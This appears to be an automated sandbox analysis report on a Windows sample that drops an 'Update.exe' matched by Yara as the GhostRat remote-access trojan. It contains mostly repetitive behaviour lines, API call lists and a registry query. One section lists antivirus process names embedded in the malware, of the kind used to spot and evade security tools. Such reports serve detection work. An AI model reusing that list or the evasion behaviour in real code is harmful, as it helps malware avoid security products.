Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\Uulw5M1DfU.exe

Code function: 0_2_00401626 ??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetLocalTime,SystemTimeToFileTime,??2@YAPAXI@Z,GetLastError,??3@YAXPAX@Z,??3@YAXPAX@Z,GetLastError,??3@YAXPAX@Z,GetLastError,??3@YAXPAX@Z,??3@YAXPAX@Z,

0_2_00401626

Source: C:\Users\Public\Bilite\Axialis\Update.exe

Code function: 3_2_03805D22 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,

3_2_03805D22

Source: C:\Users\user\Desktop\Uulw5M1DfU.exe

Code function: 0_2_00404FAA GetVersionExW,GetCommandLineW,_wtol,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetModuleFileNameW,_wtol,??2@YAPAXI@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,wsprintfW,_wtol,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,CoInitialize,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetKeyState,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetFileAttributesW,??3@YAXPAX@Z,??3@YAXPAX@Z,_wtol,memset,ShellExecuteExW,WaitForSingleObject,CloseHandle,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,SetCurrentDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,MessageBoxA,

0_2_00404FAA

Source: C:\Users\Public\Bilite\Axialis\Update.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Update.exe	Binary or memory string: acs.exe
Source: Update.exe	Binary or memory string: vsserv.exe
Source: Update.exe	Binary or memory string: kxetray.exe
Source: Update.exe	Binary or memory string: avcenter.exe
Source: Update.exe	Binary or memory string: KSafeTray.exe
Source: Update.exe	Binary or memory string: cfp.exe
Source: Update.exe	Binary or memory string: avp.exe
Source: Update.exe	Binary or memory string: 360Safe.exe
Source: Update.exe	Binary or memory string: rtvscan.exe
Source: Update.exe	Binary or memory string: 360tray.exe
Source: Update.exe	Binary or memory string: ashDisp.exe
Source: Update.exe	Binary or memory string: TMBMSRV.exe
Source: Update.exe	Binary or memory string: 360Tray.exe
Source: Update.exe	Binary or memory string: avgwdsvc.exe
Source: Update.exe	Binary or memory string: AYAgent.aye
Source: Update.exe	Binary or memory string: QUHLPSVC.EXE
Source: Update.exe	Binary or memory string: RavMonD.exe
Source: Update.exe	Binary or memory string: Mcshield.exe
Source: Update.exe	Binary or memory string: K7TSecurity.exe

Stealing of Sensitive Information

Yara detected GhostRat

Source: Yara match	File source: 3.3.Update.exe.482260b.14.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.Update.exe.482260b.14.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.Update.exe.482260b.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.Update.exe.482260b.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Update.exe.36705bf.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.Update.exe.482260b.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Update.exe.37f0000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Update.exe.482260b.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.Update.exe.482260b.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.Update.exe.482260b.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Update.exe.482260b.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.Update.exe.92667b.0.raw.unpack, type: UNPACKEDPE
